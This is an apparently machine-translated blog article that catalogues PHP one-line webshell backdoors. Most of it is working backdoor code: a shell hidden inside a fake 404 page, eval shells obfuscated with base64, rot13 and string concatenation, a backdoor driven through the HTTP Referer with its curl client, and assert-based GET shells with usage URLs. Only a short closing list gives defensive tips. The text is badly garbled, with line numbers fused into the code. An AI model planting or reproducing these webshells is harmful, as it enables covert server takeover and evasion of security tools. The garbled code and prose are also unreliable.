Powerful PHP with a word back door

Tough PHP a word back door

This kind of backdoor lets the website, the server administrator is the headache, often must change the method carries on the various detection, but many new writing technology, uses the common detection method to be unable to discover and the processing.

Today we count some interesting php a word trojan.

1. Use the 404 page to hide the PHP pony:

1 <!DOCTYPE HTML PUBLIC "-//ietf//dtd HTML 2.0//en">2 <HTML><Head>3 <title>404 Not Found</title>4 </Head><Body>5 <H1>Not Found</H1>6 <P>The requested URL is not found on this server.</P>7 </Body></HTML>8 <?PHP9 @preg_replace ("/[pageerror]/e", $_post[' error '], "Saft");Ten header (' http/1.1 404 Not Found '); One ?>

404 pages are commonly used in the Web site files, generally recommended after very few people will go to it to check the changes, then we can use this to hide the back door.

2. No feature hidden PHP sentence:

1 <? PHP 2 Session_Start (); 3 $_post $_session Trim ($_post[' Code ']); 4 $_session [' Thecode ']&&preg_replace(' ' a\ ' eis ', ' e '. ') V '. ' A '. ' L '. ' (Base64_decode ($_session[\ ' thecode\ ')) ', ' a '); 5 ?>

Assign the contents of $_post[' code '] to $_session[' Thecode '] and execute $_session[' Thecode ', the highlight is no signature.

With the scanning tool to check the code, it will not call the police, to achieve the purpose.

3. Super Hidden PHP Backdoor:

1 $_get A ($_get[b]);? >

The Trojan is formed only by the Get function;

How to use:

1 . A=assert&b=${fputs%28fopen%28base64_decode%28yy5waha%29,w%29,base64_decode% 28pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x%29%29};

After executing the current directory generated c.php a Trojan horse, when the parameter a for eval will error Trojan generation failure, for assert the same error, but will generate Trojan horse, really can not be belittled, a simple sentence, is extended to this application.

Level request, code to run the PHP Backdoor:

This method is implemented with two files, file 1

1<?PHP2 //1.php3 Header(' Content-type:text/html;charset=utf-8 ');4 Parse_str($_server[' Http_referer '],$a);5 if(Reset($a) = = ' Ten ' &&Count($a) = = 9) {6 Eval(Base64_decode(Str_replace(" ", "+",implode(Array_slice($a, 6)))));7 }8?>

File 2

1<?PHP2 //2.php3 Header(' Content-type:text/html;charset=utf-8 ');4 //the code to execute5 $code= <<<CODE6 Phpinfo();7 CODE;8 //for base64 encoding9 $code=Base64_encode($code);Ten //constructing a Referer string One $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i= "; A //Backdoor URL - $url= ' http://localhost/test1/1.php '; - $ch=curl_init (); the $options=Array( -Curlopt_url =$url, -Curlopt_header =FALSE, -Curlopt_returntransfer =TRUE, +Curlopt_referer =$referer - ); +Curl_setopt_array ($ch,$options); AEchocurl_exec ($ch); at?>

The base64 encoded code is run through the Http_referer in the HTTP request to achieve the effect of the backdoor, and the general WAF referer the detection to be a little bit loose, or not detected.

Using this idea bypass WAF is good.

4.PHP Backdoor Generation tool weevely

Weevely is a free software for PHP Webshell that can be used to simulate a telnet-like connection shell,weevely often used for Web program exploits, hiding backdoors, or using a telnet-like approach instead of Web page-based management. Weevely generated server-side PHP code is Base64 encoded, so you can cheat the mainstream anti-virus software and IDs, upload server-side code can usually be run directly through weevely.

Weevely generated by the use of the PHP backdoor method is now more mainstream base64 encryption combined with string morphing technology, the function used in the back door is a commonly used string processing functions, as the check rules of Eval,system and other functions will not appear directly in the code, This can cause backdoor files to bypass the Backdoor lookup tool check. Using the dark Group of Web backdoor Avira tools to scan, the results show that the file is free of any threats.

The above is about the introduction, the relevant use of the method is not in this introduction, simple science.

5 . Three variants of a sentence PHP Trojan
The first one:

1 <?php ($_[email protected]$_get[2]) [email protected]$_($_post[1] )?>

Write the Http://site/1.php?2=assert code in the chopper is 1.

A second

 1  <? php  2  $_  = " 3  $_  [+ ""]= "' ; 4  $_  = "$_ ".""  5  $_  = ($_ [+""]|""). ($_  [+ ""]| ""). ($_  [+ ""]^ ""  6 ? >$_ }[' _ '] (${' _ '.  $_ }[' __ ']);? 

Write Http://site/2.php?_=assert&__=eval ($_post[' Pass ') in the kitchen knife password is pass.

If you use the additional data of the kitchen knife is more covert, or with other injection tools can also, because it is post submitted.

A third

1 ($b 4dboy$_post[' B4dboy ']) && @preg_replace('/ad/e ', ' @ ').  str_rot13(' Riny '). ' ($b 4dboy) ', ' Add ');

str_rot13 (' Riny ') that is encoded after the eval, completely avoid the keyword, but also without losing effect, let people vomit blood!

6. Last column of several advanced PHP a word trojan Backdoor:
1.

1 $hh= "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E "; 2 $hh ("/[discuz]/e",$_post[' H '], "Access");

Kitchen knife A word
2.

1 $filename=$_get[' xbid ']; 2 include ($filename);

Dangerous include function, directly compile any file to run in PHP format
3.

1 $reg= "C". " O "." P "." Y "; 2 $reg ($_files[Myfile][tmp_name],$_files[myfile][name]);

Rename any File
4.

1 $gzid= "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E "; 2 $gzid ("/[discuz]/e",$_post[' H '], "Access");

Kitchen knife A word
5.

1 include ($uid);

Dangerous include function, directly compile any file to run in PHP format, POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
GIF insert a sentence

In summary, these PHP a word back door is perfectly formed, accidentally you certainly in the recruit, and we today this article of the weight of the top of it? The focus is on the summary below!

How to deal with PHP a word back door:
We emphasize a few key points, see this article you believe not layman, I will not wordy:

• Be aware of the security of PHP programming
• Server log files are often seen, often backed up
• Strict permission assignment for each site
• Regular batch security review of dynamic files and directories
• Learn how to carry out manual anti-virus "that is, behavioral judgment Avira"
• Stay focused, or infiltrate an active cyber security camp
• Hierarchical processing of server environments, even if a function can make rules

We think that when the management of the site more, the data is large, we should reasonably apply some of the auxiliary tools, but should not rely entirely on these tools, technology is always in the update progress, the most important thing is you should learn and understand, write these powerful back door of the person's thinking, the role of transposition can bring you greater progress.

Powerful PHP with a word back door